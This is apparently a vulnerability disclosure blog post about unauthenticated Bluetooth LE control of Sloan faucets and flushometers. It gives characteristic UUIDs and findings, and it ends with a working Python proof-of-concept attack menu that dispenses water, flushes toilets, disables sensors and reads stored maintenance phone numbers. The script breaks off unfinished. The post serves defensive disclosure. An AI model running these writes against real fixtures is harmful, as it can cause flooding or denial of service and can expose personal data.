There are two types of Activation Mode: Metered and On Demand. What’s the difference between them? Surely the internet will tell me.

A Google Play Store comment indicating confusion on Metered and On Demand flow rate

Nope, no luck there. There are a few variable definitions that may give us a clue. Could that On Demand value be a mistake, off by an order of magnitude?

public final class ActivationModeFragmentKt {
    private static final int METERED_MAX_VALUE = 120;
    public static final int METERED_MODE = 1;
    private static final int MIN_VALUE = 3;
    private static final int ON_DEMAND_MAX_VALUE = 1200;
    public static final int ON_DEMAND_MODE = 0;
}

Unfortunately those safeguards don’t seem to be set anywhere else. Let’s see if we can find the code that controls this. Two different characteristics control the run times for the different modes.

public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME = "d0aba888-fb10-4dc9-9b17-bdd8f490c945";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME = "d0aba888-fb10-4dc9-9b17-bdd8f490c944";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION = "d0aba888-fb10-4dc9-9b17-bdd8f490c943";

Flow Rate characteristics and values

And we can see how these are set on the device. I’m going to go ahead and assume that everything on this device is written as ASCII. So, Mode is set to 0x30 == “0”, which we can see is ON_DEMAND_MODE. And then the Metered Run Time is set to 120 seconds, and On Demand is set to 30 seconds. Cool. Let’s see how high we can go. This is going to be painful, waiting for many minutes for this thing to turn back off.
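Under that same ASCII assumption, decoding what we read back is straightforward. This sketch reuses the two mode constants from the decompiled class above; the helper names are hypothetical and not part of the app.

```python
ON_DEMAND_MODE = 0
METERED_MODE = 1
MODE_NAMES = {ON_DEMAND_MODE: "On Demand", METERED_MODE: "Metered"}


def decode_ascii_int(raw: bytes) -> int:
    """Interpret raw characteristic bytes as an ASCII decimal number."""
    return int(raw.decode("ascii"))


def describe_mode(raw: bytes) -> str:
    """Map the Mode Selection value to a readable name."""
    return MODE_NAMES.get(decode_ascii_int(raw), "unknown")
```

With this, the byte 0x30 decodes to mode 0 (On Demand), and the run time values come back as plain integers in seconds.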

The On Demand characteristic set to 1130 seconds

Ok, we’ve set the On Demand time to 1130 seconds, so, just under 19 minutes. I wave my hand in front of the faucet’s IR sensor, and grab a cup of coffee. This is gonna take a while…. That didn’t work. It shut off quickly. There must be some internal idea of how long is too long. I’ll flip the mode to metered and set that pretty high. Seems metered won’t take more than 3 bytes, so I’ll set the first one to 9 for 920 seconds, or ~15 minutes. And then I’ll wait.

Metered Mode set to 920 seconds

It’s still going. There’s gotta be a better way to test. Currently, I wave my hand in front of the sensor once to engage the faucet, and then try periodically over the timer duration. It won’t make the click of engagement until the time is up. So, the next time I can wave my hand in front of the sensor and hear a click, I know the faucet’s timer has ended. This won’t be incredibly accurate or scientific. I set a 14 min timer and walked away. Annnnd somehow I walked right back in at the 15 minute mark and heard it click off. So, the highest value we can likely set for Metered mode is 999, which is 16.65 minutes. That’s a long time to leave the tap on. I wonder who would want to do something like that…
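For the record, here’s the arithmetic behind those numbers as a quick sketch. It assumes the run time is written as ASCII decimal digits, so the field width caps the value; the helper names are mine.

```python
def max_ascii_value(width: int) -> int:
    """Largest decimal number that fits in `width` ASCII digits."""
    return 10 ** width - 1


def seconds_to_minutes(seconds: int) -> float:
    """Convert a run time in seconds to minutes."""
    return seconds / 60


# Metered mode accepted at most three bytes in my testing.
limit = max_ascii_value(3)
print(limit, round(seconds_to_minutes(limit), 2))
```

The same conversion puts the 920-second test at a little over 15 minutes, which matches when I heard the click.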

Wet Bandits — Be on the lookout — These criminals are armed and clumsy

DoS

In addition to causing a flood, we can trigger the opposite effect. It’s possible to disable the faucet’s sensor completely by setting the Sensor Range to 0. Now, the faucet won’t turn on no matter how close our hand gets or how vigorously we wave. In this case, we can simply send a 0x30 to UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE.
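As a rough sketch of that write, assuming a connected bluepy Peripheral (or anything exposing the same getCharacteristics and write methods): the function name and the one-digit range check are my own assumptions, while the UUID is the Sensor Range characteristic from the app’s definitions. Only point this at hardware you own.

```python
SENSOR_RANGE_UUID = "d0aba888-fb10-4dc9-9b17-bdd8f490c942"


def set_sensor_range(peripheral, value: int) -> bytes:
    """Write a single ASCII digit to the Sensor Range characteristic."""
    if not 0 <= value <= 9:
        raise ValueError("sensor range is assumed to be one ASCII digit")
    payload = str(value).encode("ascii")  # 0 -> b"0", i.e. the byte 0x30
    chars = peripheral.getCharacteristics(uuid=SENSOR_RANGE_UUID)
    if not chars:
        raise LookupError("Sensor Range characteristic not found")
    chars[0].write(payload, withResponse=True)
    return payload
```

With bluepy installed, set_sensor_range(Peripheral(address), 0) would send the 0x30 described above, where address is the faucet’s BLE address.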

Model and Version

It’s also possible to read the model and version number via these characteristics. Nothing super exciting here, but could be useful if we were trying to find a specific version. Most BLE enabled devices will expose these via the “Device Information” service. These are separate from that and something Sloan must have thought necessary.

Firmware & Hardware

public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION = "d0aba888-fb10-4dc9-9b17-bdd8f490c906";
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION = "d0aba888-fb10-4dc9-9b17-bdd8f490c905";

Firmware: 0109

Hardware: 0175

Logged Phone Numbers

The “security” mode of the faucet logs the phone number stored in the app for certain events.

public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c932";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c930";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92e";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92f";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = "d0aba888-fb10-4dc9-9b17-bdd8f490c929";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92b";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92a";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92c";
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE = "d0aba888-fb10-4dc9-9b17-bdd8f490c92d";

Phone numbers stored on faucet

I’ve conveniently set these to the Tenable support number 855-267-7044. In a real setup, this would be the phone number registered in the app that performed each specific task update. I attempted to see how wide the field was, and got up to 15 characters before it wouldn’t take any more.

It doesn’t seem like the app is parsing anything in the text fields, so no XSS that I can find.

The other interesting thing here is that any time someone makes a change to the faucet, the app causes their phone number to be stored on the faucet. This is then reflected back to any app that connects OR anyone that reads the characteristic. This isn’t mentioned in the app and I don’t see a privacy policy. Does GDPR apply to bathroom fixtures?

Aquis Dongle

What is Aquis? I don’t know. But there are several characteristics in the app for an Aquis Dongle. Could this be a new product line? A partnership with another company that this app will work with?

public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION = "d0aba888-fb10-4dc9-9b17-bdd8f490c90e";
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION = "d0aba888-fb10-4dc9-9b17-bdd8f490c90d";
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE = "d0aba888-fb10-4dc9-9b17-bdd8f490c90c";
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL = "d0aba888-fb10-4dc9-9b17-bdd8f490c90b";
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU = "d0aba888-fb10-4dc9-9b17-bdd8f490c90F";

There does seem to be a company called Aquis that offers connected faucets. Perhaps they’re one of Sloan’s partners or produced the tech for Sloan.

Aquis Multifunctional Faucet feature sheet

That ‘optional service APP’ sounds just like what we’re looking at.

OTA Firmware Update

The service UUID 1d14d6ee-fd63-4fa1-bfa4-8f47b42119f0 maps to the variable name UUID_SERVICE_OTA in our variable definitions file. A quick search reveals this to be the Silicon Labs OTA service, which also gives us insight into the chipset used here. We’ll have to dig into this.

OTA means “Over-The-Air” and is the method to write firmware to various BLE chipsets. As far as I can tell, the different major chipset manufacturers each have their own OTA spec, and they are not interoperable even if they’re called the same thing. Therefore it can be helpful to have chipset specific tools to manipulate OTA. There are often various levels of security that can be added by the developer, including checking firmware signatures or not.

Silicon Labs Gecko bootloader has 3 optional settings for secure firmware update:

  • Require signed firmware upgrade files.
  • Require encrypted firmware upgrade files.
  • Enable secure boot.

Silicon Labs defines these as:

  • Secure Boot refers to the verification of the authenticity of the application image in main flash on every boot of the device.
  • Secure Firmware Upgrade refers to the verification of the authenticity of an upgrade image before performing a bootload, and optionally enforcing that upgrade images are encrypted.

If none of those are selected by the developer, it’s possible to write any firmware to the device. As the faucet was quite expensive, I did not test firmware update and am merely pointing out that it’s exposed.

Using one of the Silicon Labs Android apps, we can quickly see that it’s possible to do an OTA firmware update. There’s no telling what the firmware in place is checking for. I don’t want to break this thing yet.

I also grepped through the Android APK but don’t see anything that references the three OTA variable names. I guess they’ll implement updates in the future. This makes me think that the OTA feature uses stock code from the SDK.

Hardware — BLE Adapters

These vulns should be exploitable via any BLE adapter, but since hardware can be finicky, the specific adapters I tested with are:

Cyberkinetic Effects or Why should I even care

Sure, turning on the water might not be the next million dollar ransomware campaign, and flushing the toilets remotely seems like a great prank, but not much more. Still, there can be real interesting effects. First off, these faucets aren’t usually for home use, but installed in office buildings, in groups. Turning on all of the faucets repeatedly or flushing all of the toilets could possibly cause a flooding condition. Move over SYN flood, this is a sink flood.

But these devices aren’t networked! They have no IP! They’re limited by range! These are great points. However, the faucet likely has a 30-foot BLE range. This is well within range of some miscreant standing at their local donut shop near the office. A neighboring unit in a condo or apartment building would also be well within range. Also, most laptops and desktops include Bluetooth adapters, so any malware infection is a potential vector. I always like to point out that a BLE device is only a hop away from any modern laptop.

Findings

  • Enable Water Dispense: Kinetic Effect
  • Change Flow Rate: Kinetic Effect
  • Change Activation Mode / Time: Kinetic Effect / DoS
  • Change Sensor Range to 0: DoS
  • Maintenance Person Cell Phone Number Modification and Disclosure: Information Leakage
  • Enable Toilet Flush: Kinetic Effect
  • Model Number is writable: Modification of Assumed Immutable Data

PoC || GTFlow

Here’s a quick proof of concept in case you’ve got an unpatched faucet or flushometer lying around. As of this posting, Sloan has not responded to our disclosure emails and to our knowledge has not released an update.

from bluepy.btle import Scanner, DefaultDelegate, Peripheral, UUID, BTLEDisconnectError, BTLEGattError, BTLEManagementError, BTLEInternalError
SCAN_TIMEOUT = 2.0
DEBUG = 0
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c965")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLOW_RATE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c949")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c945");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c944");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c943");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c942");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c906");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c905");
UUID_CHARACTERISTIC_FAUCET_BD_DEVICE_INFO_MODEL_NUMBER = UUID("00002a24-0000-1000-8000-00805f9b34fb");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c932");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c930");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92e");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92f");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c929");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92b");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92a");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92c");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92d");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_FLUSHER_NOTE_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88338");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_ACTIVATION_TIME_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88337");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_DIAGNOSTIC = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88335");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88331");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FIRMWARE_UPDATE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88336");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88334");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_LINE_SENTINAL_FLUSH_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88333");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88332");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90e");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90d");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90c");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90b");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90F");
AQUIS_UUIDS = (
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU
)
UUID_CHARACTERISTIC_APP_IDENTIFICATION_LOCK_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c953");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c954");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_TIMESTAMP = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c951");
UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c952");
LOCK_INFO = (
UUID_CHARACTERISTIC_APP_IDENTIFICATION_LOCK_STATUS,
UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE,
UUID_CHARACTERISTIC_APP_IDENTIFICATION_TIMESTAMP,
UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY,
)
FAUCET_PHONE_UUIDS = (
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE,
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_FLUSHER_NOTE_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_ACTIVATION_TIME_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_DIAGNOSTIC,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FIRMWARE_UPDATE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_LINE_SENTINAL_FLUSH_CHANGE,
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE,

)
UUID_CHARACTERISTIC_OTA_CONTROL = UUID("f7bf3564-fb6d-4e53-88a4-5e37e0326063");
UUID_CHARACTERISTIC_OTA_DATA_TRANSFER = UUID("984227f3-34fc-4045-a5d0-2c581f81a153");
OTA = (
UUID_CHARACTERISTIC_OTA_CONTROL,
UUID_CHARACTERISTIC_OTA_DATA_TRANSFER,
)
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_1 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94a");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_2 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94b");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_3 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94c");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_4 = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c94d");
NOTES = (
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_1,
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_2,
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_3,
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_BD_NOTE_4,
)
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_COMMUNICATION_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c969");
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_SOLAR_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c968");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c966");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_DATE_OF_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c967");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_INIT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c961");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_SENSOR_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c962");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_TURBINE_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c964");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_VALVE_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c963");
DIAG = (
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_DATE_OF_DIAGNOSTIC,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_INIT,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_SENSOR_RESULT,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_TURBINE_RESULT,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_VALVE_RESULT,
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_COMMUNICATION_STATUS,
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_SOLAR_STATUS,
)
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88361");
UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_PRODUCTION_ENABLE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c971");
UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_ADAPTIVE_SENSING_ENABLE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c978");
UUID_CHARACTERISTIC_BATTERY_LEVEL = UUID("00002a19-0000-1000-8000-00805f9b34fb");
UUID_CHARACTERISTIC_FAUCET_BD_BATTERY_LEVEL = UUID("00002a19-0000-1000-8000-00805f9b34fb");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c966");
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88364");
BATTERY_INFO = (
UUID_CHARACTERISTIC_BATTERY_LEVEL,
UUID_CHARACTERISTIC_FAUCET_BD_BATTERY_LEVEL,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC,
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_BATTERY_LEVEL_AT_DIAGNOSTIC,
)
ATTACKS_DICT = {
"0": ("Dispense Water", UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE, "Enter a 1 to begin Dispensing water: "),
"1": ("Flush Toilet", UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE, "Enter a 1 to begin flushing diagnostic: "),
"2": ("Change Faucet Flow Rate", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLOW_RATE, "Enter two digits together, they'll be a float (11 will be 1.1lpm): "),
"3": ("Change Faucet Activation Mode", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION, "Enter a 0 (ondemand) or a 1 (metered) to change the activation mode.: "),
"4": ("Change Faucet OnDemand Run Time", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME, "Enter 2 digits (10 = 10 seconds): "),
"5": ("Change Faucet Metered Run Time", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME, "Enter 3 digits (120 = 120 seconds): "),
"6": ("Change Sensor Range", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE, "Enter 1 digit (0 to disable sensor): "),
"7": ("Read Maintenance Personnel Info", FAUCET_PHONE_UUIDS, "N/A"),
"8": ("Change Model Number", UUID_CHARACTERISTIC_FAUCET_BD_DEVICE_INFO_MODEL_NUMBER, "Enter a new model number: "),
"9": ("OTA (doesn't write)", OTA, "N/A"),
"10": ("Read HW", UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION, "N/A"),
"11": ("Read FW", UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION, "N/A"),
"12": ("Read AQUIS Info", AQUIS_UUIDS, "N/A"),
"13": ("Read Locking Information", LOCK_INFO, "N/A"),
"14": ("Read Diagnostic Info", DIAG, "N/A"),
"15": ("Read NOTES", NOTES, "N/A"),
"16": ("Write NOTES", NOTES, "Enter something to write to the 4 notes fields:"),
"17": ("Production Enable", UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_PRODUCTION_ENABLE, "Write something to production enable: "),
"18": ("Adaptive Sensing Enable (gain/sensitivity changes not implemented)", UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_ADAPTIVE_SENSING_ENABLE, "Write to Adaptive Sensing Enable: "),
"19": ("Read Battery Info", BATTERY_INFO, "N/A"),
}
class ScanDelegate(DefaultDelegate):
    """Scan delegate with default behavior; no custom discovery handling."""

    def __init__(self):
        DefaultDelegate.__init__(self)


def convert_num_for_writing(text):
    # The device appears to store every value as ASCII text, so the input
    # string is sent as its raw bytes ("19" -> b"19").
    return text.encode()


def read_then_write(char, prompt, target_name, skip_read=False):
    # Print the current value when the characteristic is readable, then
    # prompt for and write a new value unless the attack is read-only.
    if char.supportsRead() and not skip_read:
        val = char.read()
        print(f"[ >] {target_name} responds with current value: {val}")
    if prompt != "N/A":
        sendme = convert_num_for_writing(input(prompt))
        char.write(sendme, withResponse=True)


def run_sink_flood(attack, target, p):
    attack_name, uuid, prompt = attack
    target_name = target["name"]
    # An attack targets either a single UUID or a tuple of UUIDs.
    uuids = (uuid,) if isinstance(uuid, UUID) else uuid
    for i in uuids:
        try:
            chars = p.getCharacteristics(uuid=i)
            if not chars:
                continue  # characteristic not present on this device
            read_then_write(chars[0], prompt, target_name,
                            skip_read=(attack_name == "Dispense Water"))
        except BTLEGattError as err:
            print(f"[!] GATT error on {i}: {err}")


def menu_pick_attack(target):
    for key, attack in ATTACKS_DICT.items():
        print(f"[{key}] {attack[0]}")
    # Re-prompt until the selection matches a menu entry.
